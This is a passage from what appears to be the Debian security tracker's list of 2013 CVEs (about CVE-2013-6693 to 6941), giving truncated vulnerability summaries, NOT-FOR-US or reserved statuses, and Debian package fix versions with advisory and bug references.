vulnerability in Citrix NetScaler Ap ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6941 (Unspecified vulnerability in Citrix NetScaler Application Delivery Con ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6940 (Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9. ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6939 (Unspecified vulnerability in Citrix NetScaler Application Delivery Con ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6938 (Unspecified vulnerability in the Service VM in Citrix NetScaler SDX 9. ...) NOT-FOR-US: Citrix NetScaler SDX CVE-2013-6937 (Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows ...) NOT-FOR-US: VideoCharge CVE-2013-6936 (Multiple SQL injection vulnerabilities in ajaxfs.php in the Ajax forum ...) NOT-FOR-US: MyBB (aka MyBulletinBoard) CVE-2013-6935 (Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows ...) NOT-FOR-US: VideoCharge CVE-2013-6934 (The parseRTSPRequestString function in Live Networks Live555 Streaming ...) - liblivemedia (incomplete patch never applied) - vlc (never built against liblivemedia with incomplete patch) - mplayer (never built against liblivemedia with incomplete patch) - mplayer2 (b-d's on liblivemedia but doesn't actually build the support for it) CVE-2013-6933 (The parseRTSPRequestString function in Live Networks Live555 Streaming ...) {DSA-3156-1} - liblivemedia 2014.01.13-1 [squeeze] - liblivemedia (vuln. code introduced in 2011.08.13) - vlc 2.1.4-1 [wheezy] - vlc 2.0.3-5+deb7u2 [squeeze] - vlc (not built against vuln. liblivemedia) - mplayer 2:1.1.1+svn37434-1 (low) [squeeze] - mplayer (Minor issue) - mplayer2 (b-d's on liblivemedia but doesn't actually build the support for it) NOTE: vlc fixed by binNMU 2.1.2-2+b1, but since binNMUs are not visible to the security tracker, the subsequent sid upload is tracked NOTE: for wheezy the version present at release of DSA 3156 is used (2.0.3-5+deb7u2), although strictly speaking it's 2.0.3-5+deb7u2+b1 CVE-2013-6932 (Buffer overflow in IrfanView before 4.37, when a multibyte-character d ...) NOT-FOR-US: IrfanView CVE-2013-6931 (SQL injection vulnerability in the API in Cybozu Garoon 3.7.x before 3 ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6930 (SQL injection vulnerability in the page-navigation implementation in C ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6929 (SQL injection vulnerability in Cybozu Garoon 3.7 SP2 and earlier allow ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6928 RESERVED CVE-2013-6927 (Internet TRiLOGI Server (unknown versions) could allow a local user to ...) NOT-FOR-US: Internet TRiLOGI Server CVE-2013-6926 (The integrated HTTPS server in Siemens RuggedCom ROS before 3.12.2 all ...) NOT-FOR-US: Siemens CVE-2013-6925 (The integrated HTTPS server in Siemens RuggedCom ROS before 3.12.2 all ...) NOT-FOR-US: Siemens CVE-2013-6924 (Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow re ...) NOT-FOR-US: Seagate BlackArmor NAS devices CVE-2013-6923 (Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackAr ...) NOT-FOR-US: Seagate BlackArmor NAS 220 devices CVE-2013-6922 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Seag ...) NOT-FOR-US: Seagate BlackArmor NAS 220 CVE-2013-6921 RESERVED CVE-2013-6985 (SQL injection vulnerability in m_worklog/log_searchday.jsp in Enorth W ...) NOT-FOR-US: Enorth Webpublisher CMS CVE-2013-6920 (Siemens SINAMICS S/G controllers with firmware before 4.6.11 do not re ...) NOT-FOR-US: Siemens CVE-2013-6919 (The default configuration of phpThumb before 1.7.12 has a false value ...) NOT-FOR-US: phpThumb CVE-2013-6917 RESERVED CVE-2013-6916 (Cross-site scripting (XSS) vulnerability in the Yahoo! User Interface ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6915 (Cross-site scripting (XSS) vulnerability in the system-administration ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6914 (Cross-site scripting (XSS) vulnerability in a calendar component in Cy ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6913 (Cross-site scripting (XSS) vulnerability in a search component in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6912 (Cross-site scripting (XSS) vulnerability in a calendar component in Cy ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6911 (Cross-site scripting (XSS) vulnerability in the bulletin-board compone ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6910 (Cross-site scripting (XSS) vulnerability in Ajax components in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6909 (Cross-site scripting (XSS) vulnerability in a report component in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6908 (Cross-site scripting (XSS) vulnerability in a mail component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6907 (Cross-site scripting (XSS) vulnerability in a mail component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6906 (Cross-site scripting (XSS) vulnerability in a mail component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6905 (Cross-site scripting (XSS) vulnerability in a phone component in Cyboz ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6904 (Cross-site scripting (XSS) vulnerability in a note component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6903 (Cross-site scripting (XSS) vulnerability in a schedule component in Cy ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6902 (Cross-site scripting (XSS) vulnerability in the Space function in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6901 (Cross-site scripting (XSS) vulnerability in the Space function in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6900 (Cross-site scripting (XSS) vulnerability in the system-administration ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6918 (The web interface on the Satechi travel router 1.5, when Wi-Fi is used ...) NOT-FOR-US: Satechi travel router CVE-2013-6899 RESERVED CVE-2013-6898 RESERVED CVE-2013-6897 RESERVED CVE-2013-6896 RESERVED CVE-2013-6895 RESERVED CVE-2013-6894 RESERVED CVE-2013-6893 RESERVED CVE-2013-6892 (WebSVN 2.3.3 allows remote authenticated users to read arbitrary files ...) {DSA-3137-1 DLA-136-1} - websvn 2.3.3-1.2 (bug #775682) CVE-2013-6891 (lppasswd in CUPS before 1.7.1, when running with setuid privileges, al ...) - cups 1.7.1-1 [wheezy] - cups (Vulnerable code introduced with 1.6.4) [squeeze] - cups (Vulnerable code introduced with 1.6.4) NOTE: https://www.cups.org/str.php?L4319 CVE-2013-6890 (denyhosts 2.6 uses an incorrect regular expression when analyzing auth ...) {DSA-2826-1} - denyhosts 2.6-10.1 CVE-2013-6889 (GNU Rush 1.7 does not properly drop privileges, which allows local use ...) - rush 1.7+dfsg-4 (bug #733505) [wheezy] - rush 1.7+dfsg-1+deb7u1 CVE-2013-6888 (Uscan in devscripts before 2.13.9 allows remote attackers to execute a ...) {DSA-2836-1} - devscripts 2.13.9 [squeeze] - devscripts (Minor issue) CVE-2013-6887 (OpenJPEG 1.5.1 allows remote attackers to cause a denial of service vi ...) - openjpeg 1.5.2-1 (bug #731237) [wheezy] - openjpeg (Only affects 1.5) [squeeze] - openjpeg (Only affects 1.5) CVE-2013-6886 (RealVNC VNC 5.0.6 on Mac OS X, Linux, and UNIX allows local users to g ...) - vnc4 (Only affects 5.0.6, binaries in Debian version are not setuid root) CVE-2013-6884 (The write-blocker in CRU Ditto Forensic FieldStation with firmware bef ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6883 (Cross-site request forgery (CSRF) vulnerability in CRU Ditto Forensic ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6882 (Multiple cross-site scripting (XSS) vulnerabilities in CRU Ditto Foren ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6881 (CRU Ditto Forensic FieldStation with firmware before 2013Oct15a allows ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6880 (Open redirect in proxy.php in FlashCanvas before 1.6 allows remote att ...) NOT-FOR-US: FlashCanvas CVE-2013-6879 (The Mijosoft MijoSearch component 2.0.1 and earlier for Joomla! allows ...) NOT-FOR-US: MijoSearch CVE-2013-6878 (Cross-site scripting (XSS) vulnerability in the Mijosoft MijoSearch co ...) NOT-FOR-US: MijoSearch CVE-2013-6877 (Heap-based buffer overflow in RealNetworks RealPlayer before 17.0.4.61 ...) NOT-FOR-US: RealPlayer CVE-2013-6876 (The (1) pty_init_terminal and (2) pipe_init_terminal functions in main ...) - s3d 0.2.2-9 (unimportant) NOTE: http://hmarco.org/bugs/s3dvt_0.2.2-root-shell.html NOTE: Not running with elevated privileges in Debian packaging CVE-2013-6875 (SQL injection vulnerability in functions/prepend_adm.php in Nagios Cor ...) NOT-FOR-US: Nagios XI CVE-2013-6874 (Stack-based buffer overflow in Vortex Light Alloy before 4.7.4 allows ...) NOT-FOR-US: Vortex Light Alloy CVE-2013-6873 (SQL injection vulnerability in Testa Online Test Management System (OT ...) NOT-FOR-US: Testa Online Test Management System CVE-2013-6872 (SQL injection vulnerability in managetimetracker.php in Collabtive bef ...) - collabtive 1.2-1 (low) [wheezy] - collabtive (Minor issue) CVE-2013-6871 RESERVED CVE-2013-6870 (Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk befor ...) NOT-FOR-US: Splunk Web CVE-2013-6885 (The microcode on AMD 16h 00h through 0Fh processors does not properly ...) {DSA-3128-1 DLA-155-1} - linux 3.14.2-1 - linux-2.6 NOTE: https://lkml.org/lkml/2014/1/14/198 NOTE: Linux commit: https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/commit/?id=3b56496865f9f7d9bcb2f93b44c63f274f08e3b6 (v3.14-rc1) NOTE: Might also be fixed in amd64-microcode, but details are not published (https://packages.qa.debian.org/a/amd64-microcode/news/20141218T224849Z.html) NOTE: and since this is fixed on the kernel-side, only track the kernel packages CVE-2013-6857 RESERVED CVE-2013-6856 RESERVED CVE-2013-6855 RESERVED CVE-2013-6854 RESERVED CVE-2013-6853 (Cross-site scripting (XSS) vulnerability in clickstream.js in Y! Toolb ...) NOT-FOR-US: Y! Toolbar plugin CVE-2013-6852 (Cross-site request forgery (CSRF) vulnerability in html/json.html on H ...) NOT-FOR-US: Hewlett-Packard network equipment CVE-2013-6851 RESERVED CVE-2013-6850 RESERVED CVE-2013-6849 RESERVED CVE-2013-6848 RESERVED CVE-2013-6847 RESERVED CVE-2013-6846 RESERVED CVE-2013-6845 RESERVED CVE-2013-6844 RESERVED CVE-2013-6843 RESERVED CVE-2013-6842 RESERVED CVE-2013-6841 RESERVED CVE-2013-6840 (Siemens COMOS before 9.2.0.8.1, 10.0 before 10.0.3.1.40, and 10.1 befo ...) NOT-FOR-US: Siemens COMOS CVE-2013-6839 (SQL injection vulnerability in InstantSoft InstantCMS 1.10.3 and earli ...) NOT-FOR-US: InstantCMS CVE-2013-6838 (An unspecified Enghouse Interactive Professional Services "addon produ ...) NOT-FOR-US: IVR Pro/Contact Center (VIP2000) CVE-2013-6837 (Cross-site scripting (XSS) vulnerability in the setTimeout function in ...) - web2py (unimportant) NOTE: python-web2py contains /usr/share/web2py/applications/examples/static/js/jquery.prettyPhoto.js NOTE: Only an example code CVE-2013-6836 (Heap-based buffer overflow in the ms_escher_get_data function in plugi ...) - gnumeric 1.12.9-1 (low) [wheezy] - gnumeric (Minor issue) [squeeze] - gnumeric (Minor issue) NOTE: https://projects.gnome.org/gnumeric/announcements/1.12/gnumeric-1.12.9.shtml NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=712772 CVE-2013-6835 (TelephonyUI Framework in Apple iOS 7 before 7.1, when Safari is used, ...) NOT-FOR-US: iOS CVE-2013-6834 (The ql_eioctl function in sys/dev/qlxgbe/ql_ioctl.c in the kernel in F ...) - kfreebsd-9 (Only affects 10.x) - kfreebsd-8 (Only affects 10.x) - kfreebsd-10 10.0~svn258623-1 (bug #730519) CVE-2013-6833 (The qls_eioctl function in sys/dev/qlxge/qls_ioctl.c in the kernel in ...) - kfreebsd-9 (Only affects 10.x) - kfreebsd-8 (Only affects 10.x) - kfreebsd-10 10.0~svn258623-1 (bug #730519) CVE-2013-6832 (The nand_ioctl function in sys/dev/nand/nand_geom.c in the nand driver ...) - kfreebsd-9 (Only affects 10.x) - kfreebsd-8 (Only affects 10.x) - kfreebsd-10 10.0~svn258623-1 (bug #730518) CVE-2013-6831 (PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms h ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6830 (admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5 ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6829 (admin/confnetworking.html in PineApp Mail-SeCure allows remote attacke ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6828 (admin/management.html in PineApp Mail-SeCure allows remote attackers t ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6827 (Absolute path traversal vulnerability in admin/viewmsg.php in PineApp ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6826 (cgi-bin/module//sysmanager/admin/SYSAdminUserDialog in Fortinet FortiA ...) NOT-FOR-US: Fortinet FortiAnalyzer CVE-2013-6825 ((1) movescu.cc and (2) storescp.cc in dcmnet/apps/, (3) dcmnet/libsrc/ ...) - dcmtk 3.6.1~20150629-1 (unimportant) NOTE: http://hmarco.org/bugs/dcmtk-3.6.1-privilege-escalation.html NOTE: Not running with elevated privileges in Debian packaging NOTE: http://git.dcmtk.org/web?p=dcmtk.git;a=commitdiff;h=beaf5a5c24101daeeafa48c375120b16197c9e95;hp=5349794c4c458c76609b7aeb53d0ca28cf9fe9f0 CVE-2013-6824 (Zabbix before 1.8.19rc1, 2.0 before 2.0.10rc1, and 2.2 before 2.2.1rc1 ...) - zabbix 1:2.2.0+dfsg-6 (low) [squeeze] - zabbix (Minor issue) [wheezy] - zabbix (Minor issue) NOTE: https://support.zabbix.com/browse/ZBX-7479 CVE-2013-6823 (GRMGApp in SAP NetWeaver allows remote attackers to bypass intended ac ...) NOT-FOR-US: SAP CVE-2013-6822 (GRMGApp in SAP NetWeaver allows remote attackers to have unspecified i ...) NOT-FOR-US: SAP CVE-2013-6821 (Directory traversal vulnerability in the Exportability Check Service i ...) NOT-FOR-US: SAP CVE-2013-6820 (Unrestricted file upload vulnerability in the SAP NetWeaver Developmen ...) NOT-FOR-US: SAP CVE-2013-6819 (Cross-site scripting (XSS) vulnerability in Performance Provider in SA ...) NOT-FOR-US: SAP CVE-2013-6818 (SAP NetWeaver Logviewer 6.30, when running on Windows, allows remote a ...) NOT-FOR-US: SAP CVE-2013-6817 (Heap-based buffer overflow in SAP Network Interface Router (SAProuter) ...) NOT-FOR-US: SAP CVE-2013-6816 (Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDum ...) NOT-FOR-US: SAP CVE-2013-6815 (The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS A ...) NOT-FOR-US: SAP CVE-2013-6814 (The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote ...) NOT-FOR-US: SAP CVE-2013-6813 RESERVED CVE-2013-6812 (The ONEDC app before 1.7 for iOS does not properly verify X.509 certif ...) NOT-FOR-US: ONEDC app CVE-2013-6811 (Multiple cross-site request forgery (CSRF) vulnerabilities in the D-Li ...) NOT-FOR-US: D-Link CVE-2013-6810 (The server in Brocade Network Advisor before 12.1.0, as used in EMC Co ...) NOT-FOR-US: EMC Connectrix Manager Converged Network Edition CVE-2013-6809 (Format string vulnerability in the client in Tftpd32 before 4.50 allow ...) NOT-FOR-US: Tftpd32 CVE-2013-6808 (Cross-site scripting (XSS) vulnerability in lib/NSSDropoff.php in Zend ...) NOT-FOR-US: ZendTo CVE-2013-6869 (SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC funct ...) NOT-FOR-US: Sap NetWeaver CVE-2013-6868 (SAP Sybase Adaptive Server Enterprise (ASE) 15.0.3 before 15.0.3 ESD#4 ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6867 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6866 (SAP Sybase Adaptive Server Enterprise (ASE) before 15.0.3 ESD#4.3, 15. ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6865 (SAP Sybase Adaptive Server Enterprise (ASE) 15.0.3 before 15.0.3 ESD#4 ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6864 (Directory traversal vulnerability in SAP Sybase Adaptive Server Enterp ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6863 (SAP Sybase Adaptive Server Enterprise (ASE) 15.0.3 before 15.0.3 ESD#4 ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6862 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6861 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6860 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6859 (SAP Sybase Adaptive Server Enterprise (ASE) before 15.0.3 ESD#4.3. 15. ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6858 (Multiple cross-site scripting (XSS) vulnerabilities in OpenStack Dashb ...) - horizon 2013.2-2 (bug #730752) [wheezy] - horizon (Vulnerable code not present) NOTE: https://github.com/openstack/horizon/commit/6179f70290783e55b10bbd4b3b7ee74db3f8ef70 CVE-2013-6807 (The client in OpenText Exceed OnDemand (EoD) 8 supports anonymous ciph ...) NOT-FOR-US: OpenText Exceed OnDemand CVE-2013-6806 (OpenText Exceed OnDemand (EoD) 8 allows man-in-the-middle attackers to ...) NOT-FOR-US: OpenText Exceed onDemand CVE-2013-6805 (OpenText Exceed OnDemand (EoD) 8 uses weak encryption for passwords, w ...) NOT-FOR-US: OpenText Exceed OnDemand CVE-2013-6804 (Cross-site scripting (XSS) vulnerability in the Search module before 1 ...) NOT-FOR-US: Jamroom Search module CVE-2013-6803 RESERVED CVE-2013-6802 (Google Chrome before 31.0.1650.57 allows remote attackers to bypass in ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6801 (Microsoft Word 2003 SP2 and SP3 on Windows XP SP3 allows remote attack ...) NOT-FOR-US: Microsoft CVE-2013-6800 (An unspecified third-party database module for the Key Distribution Ce ...) NOTE: Pointless split from CVE-2013-1418 CVE-2013-6799 (Apple Mac OS X 10.9 allows local users to cause a denial of service (m ...) NOT-FOR-US: Apple Mac OS X CVE-2013-6798 (BlackBerry Link before 1.2.1.31 on Windows and before 1.1.1 build 39 o ...) NOT-FOR-US: BlackBerry Link CVE-2013-6797 (Cross-site request forgery (CSRF) vulnerability in bluewrench-video-wi ...) NOT-FOR-US: Wordpress plugin CVE-2013-6796 (The SMTP server in DeepOfix 3.3 and earlier allows remote attackers to ...) NOT-FOR-US: DeepOfix CVE-2013-6795 (The Updater in Rackspace Openstack Windows Guest Agent for XenServer b ...) NOT-FOR-US: Rackspace Windows Agent and Updater CVE-2013-6794 (Cross-site scripting (XSS) vulnerability in the Calendar module in Ola ...) NOT-FOR-US: Olat CVE-2013-6793 (Multiple cross-site scripting (XSS) vulnerabilities in the Calendar mo ...) NOT-FOR-US: Olat CVE-2013-6792 (Google Android prior to 4.4 has an APK Signature Security Bypass Vulne ...) NOT-FOR-US: Android CVE-2013-6791 (Microsoft Enhanced Mitigation Experience Toolkit (EMET) before 4.0 use ...) NOT-FOR-US: Microsoft Enhanced Mitigation Experience Toolkit CVE-2013-6790 RESERVED CVE-2013-6789 (security/MemberLoginForm.php in SilverStripe 3.0.3 supports credential ...) - silverstripe (bug #528461) CVE-2013-6788 (The Bitrix e-Store module before 14.0.1 for Bitrix Site Manager uses s ...) NOT-FOR-US: Bitrix Site Manager CVE-2013-6787 (SQL injection vulnerability in the check_user_password function in mai ...) NOT-FOR-US: Chamilo LMS CVE-2013-6786 (Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4. ...) NOT-FOR-US: Allegro RomPager CVE-2013-6785 (Directory traversal vulnerability in url_redirect.cgi in Supermicro IP ...) NOT-FOR-US: Supermicro IPMI CVE-2013-6784 RESERVED CVE-2013-6783 RESERVED CVE-2013-6782 RESERVED CVE-2013-6781 RESERVED CVE-2013-6780 (Cross-site scripting (XSS) vulnerability in uploader.swf in the Upload ...) - yui (low; bug #730104) [squeeze] - yui (Not backportable, doesn't build from source in oldstable/stable) [wheezy] - yui (Not backportable, doesn't build from source in oldstable/stable) - yui3 - moodle 2.5.3-1 [squeeze] - moodle (Unsupported in squeeze-lts) CVE-2013-6779 RESERVED CVE-2013-6778 RESERVED CVE-2013-6777 RESERVED CVE-2013-6776 RESERVED CVE-2013-6775 (The Chainfire SuperSU package before 1.69 for Android allows attackers ...) NOT-FOR-US: Chainfire SuperSU package CVE-2013-6774 (Untrusted search path vulnerability in the ChainsDD Superuser package ...) NOT-FOR-US: Chainfire SuperSU package CVE-2013-6773 (Splunk 5.0.3 has an Unquoted Service Path in Windows for Universal For ...) NOT-FOR-US: Splunk CVE-2013-6772 (Splunk before 5.0.4 lacks X-Frame-Options which can allow Clickjacking ...) NOT-FOR-US: Splunk CVE-2013-6771 (Directory traversal vulnerability in the collect script in Splunk befo ...) NOT-FOR-US: Splunk CVE-2013-6770 (The CyanogenMod/ClockWorkMod/Koush Superuser package 1.0.2.1 for Andro ...) NOT-FOR-US: CyanogenMod/ClockWorkMod/Koush CVE-2013-6769 (The CyanogenMod/ClockWorkMod/Koush Superuser package 1.0.2.1 for Andro ...) NOT-FOR-US: CyanogenMod/ClockWorkMod/Koush CVE-2013-6768 (Untrusted search path vulnerability in the CyanogenMod/ClockWorkMod/Ko ...) NOT-FOR-US: CyanogenMod/ClockWorkMod/Koush CVE-2013-6767 (Stack-based buffer overflow in pepoly.dll in Quick Heal AntiVirus Pro ...) NOT-FOR-US: QuickHeal AntiVirus CVE-2013-6764 REJECTED CVE-2013-6763 (The uio_mmap_physical function in drivers/uio/uio.c in the Linux kerne ...) NOTE: Red Hat consider this as a non-issue: NOTE: http://seclists.org/oss-sec/2013/q4/282 CVE-2013-6762 REJECTED CVE-2013-6761 REJECTED CVE-2013-6760 REJECTED CVE-2013-6759 REJECTED CVE-2013-6758 REJECTED CVE-2013-6757 REJECTED CVE-2013-6756 REJECTED CVE-2013-6755 REJECTED CVE-2013-6754 REJECTED CVE-2013-6753 REJECTED CVE-2013-6752 REJECTED CVE-2013-6751 REJECTED CVE-2013-6750 RESERVED CVE-2013-6749 (Buffer overflow in the ActiveX control in qp2.cab in IBM Lotus Quickr ...) NOT-FOR-US: IBM Lotus Quickr CVE-2013-6748 (Buffer overflow in the ActiveX control in qp2.cab in IBM Lotus Quickr ...) NOT-FOR-US: IBM Lotus Quickr CVE-2013-6747 (IBM GSKit 7.x before 7.0.4.48 and 8.x before 8.0.50.16, as used in IBM ...) NOT-FOR-US: IBM GSKit CVE-2013-6746 (Cross-site scripting (XSS) vulnerability in FileNet P8 Platform Docume ...) NOT-FOR-US: IBM FileNet Business Process Manager CVE-2013-6745 (Cross-site scripting (XSS) vulnerability in the IMS server before Ifix ...) NOT-FOR-US: IBM CVE-2013-6744 (The Stored Procedure infrastructure in IBM DB2 9.5, 9.7 before FP9a, 1 ...) NOT-FOR-US: IBM DB2 CVE-2013-6743 (Cross-site scripting (XSS) vulnerability in the Meeting Server in IBM ...) NOT-FOR-US: IBM Sametime CVE-2013-6742 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...) NOT-FOR-US: IBM Sametime CVE-2013-6741 (IBM Maximo Asset Management 7.x before 7.1.1.7 LAFIX.20140319-0837 and ...) NOT-FOR-US: IBM Maximo Asset Management and others CVE-2013-6740 RESERVED CVE-2013-6739 (IBM SPSS Modeler before 16 on UNIX allows remote authenticated users t ...) NOT-FOR-US: IBM CVE-2013-6738 (Cross-site scripting (XSS) vulnerability in IBM SmartCloud Analytics L ...) NOT-FOR-US: IBM CVE-2013-6737 (IBM System Storage Storwize V7000 Unified 1.3.x and 1.4.x before 1.4.3 ...) NOT-FOR-US: IBM Storwize V7000 Unified CVE-2013-6736 RESERVED CVE-2013-6735 (IBM WebSphere Portal 6.0.0.x through 6.0.0.1, 6.0.1.x through 6.0.1.7, ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-6734 (IBM WebSphere eXtreme Scale Client 7.1 through 8.6.0.4 does not proper ...) NOT-FOR-US: IBM WebSphere CVE-2013-6733 (Cross-site scripting (XSS) vulnerability in the Web Application in the ...) NOT-FOR-US: IBM Sametime CVE-2013-6732 (Cross-site scripting (XSS) vulnerability in the server in IBM Cognos B ...) NOT-FOR-US: IBM Cognos CVE-2013-6731 (IBM Netezza Performance Portal 2.x before 2.0.0.3 allows remote authen ...) NOT-FOR-US: IBM Netezza CVE-2013-6730 (IBM WebSphere Portal 6.1.0.x through 6.1.0.6 CF27, 6.1.5.x through 6.1 ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-6729 (Cross-site scripting (XSS) vulnerability in IBM QuickFile 1.0.0.0 befo ...) NOT-FOR-US: IBM QuickFile CVE-2013-6728 (The charting component in IBM WebSphere Dashboard Framework (WDF) 6.1. ...) NOT-FOR-US: IBM WebSphere Dashboard Framework CVE-2013-6727 (The Connect client in IBM Sametime 8.5.2 through 8.5.2.1 and 9.0 befor ...) NOT-FOR-US: IBM Sametime CVE-2013-6726 (Multiple cross-site scripting (XSS) vulnerabilities in WebProcess.srv ...) NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2013-6725 (Cross-site scripting (XSS) vulnerability in the Administrative Console ...) NOT-FOR-US: IBM WebSphere CVE-2013-6724 (Unspecified vulnerability in the vsflex8l ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2013-6723 (IBM WebSphere Portal 8.0.0.1 before CF09 does not properly handle refe ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-6722 (Unrestricted file upload vulnerability in the Registration/Edit My Pro ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-6721 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Service Regi ...) NOT-FOR-US: IBM WebSphere Service Registry and Repository CVE-2013-6720 (Directory traversal vulnerability in download.php in the Passive Captu ...) NOT-FOR-US: IBM Tealeaf CVE-2013-6719 (delivery.php in the Passive Capture Application (PCA) web console in I ...) NOT-FOR-US: IBM Tealeaf CX CVE-2013-6718 (The Advanced Management Module (AMM) with firmware 3.64B, 3.64C, and 3 ...) NOT-FOR-US: IBM firmware CVE-2013-6717 (The OLAP query engine in IBM DB2 and DB2 Connect 9.7 through FP9, 9.8 ...) NOT-FOR-US: IBM CVE-2013-6716 REJECTED CVE-2013-6715 RESERVED CVE-2013-6714 (The FlashCopy Manager for VMware component in IBM Tivoli Storage Flash ...) NOT-FOR-US: IBM Tivoli Storage FlashCopy Manager CVE-2013-6713 (The Data Protection for VMware component in IBM Tivoli Storage Manager ...) NOT-FOR-US: IBM Tivoli Storage Manager for Virtual Environments CVE-2013-6712 (The scan function in ext/date/lib/parse_iso_intervals.c in PHP through ...) {DSA-2816-1} - php5 5.5.6+dfsg-2 (bug #731112) NOTE: https://git.php.net/?p=php-src.git;a=commit;h=12fe4e90be7bfa2a763197079f68f5568a14e071 CVE-2013-6711 (Cross-site scripting (XSS) vulnerability in the product-creation admin ...) NOT-FOR-US: Cisco CVE-2013-6710 (Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Trainin ...) NOT-FOR-US: Cisco CVE-2013-6709 (The registration component in Cisco WebEx Training Center provides the ...) NOT-FOR-US: Cisco CVE-2013-6708 (Cisco Cloud Portal 9.4 allows remote attackers to read files of unspec ...) NOT-FOR-US: Cisco CVE-2013-6707 (Memory leak in the connection-manager implementation in Cisco Adaptive ...) NOT-FOR-US: Cisco CVE-2013-6706 (The Cisco Express Forwarding processing module in Cisco IOS XE allows ...) NOT-FOR-US: Cisco IOS XE CVE-2013-6705 (The IP Device Tracking (IPDT) feature in Cisco IOS and IOS XE allows r ...) NOT-FOR-US: Cisco CVE-2013-6704 (Cisco IOS XE does not properly manage memory for TFTP UDP flows, which ...) NOT-FOR-US: Cisco CVE-2013-6703 (The TLS/SSLv3 module on Cisco ONS 15454 controller cards allows remote ...) NOT-FOR-US: Cisco CVE-2013-6702 (The management implementation on Cisco ONS 15454 controller cards with ...) NOT-FOR-US: Cisco CVE-2013-6701 (The tNetTaskLimit process on the Transport Node Controller (TNC) on Ci ...) NOT-FOR-US: Cisco CVE-2013-6700 (The SNMP module in Cisco IOS XR allows remote attackers to cause a den ...) NOT-FOR-US: Cisco IOS XR CVE-2013-6699 (The Control and Provisioning of Wireless Access Points (CAPWAP) protoc ...) NOT-FOR-US: Cisco CVE-2013-6698 (The web interface on Cisco Wireless LAN Controller (WLC) devices does ...) NOT-FOR-US: Cisco CVE-2013-6697 RESERVED CVE-2013-6696 (Cisco Adaptive Security Appliance (ASA) Software does not properly han ...) NOT-FOR-US: Cisco CVE-2013-6695 (The RBAC implementation in Cisco Secure Access Control System (ACS) do ...) NOT-FOR-US: Cisco CVE-2013-6694 (The IPSec implementation in Cisco IOS allows remote attackers to cause ...) NOT-FOR-US: Cisco CVE-2013-6693 (The MLDP implementation in Cisco IOS 15.3(3)S and earlier on 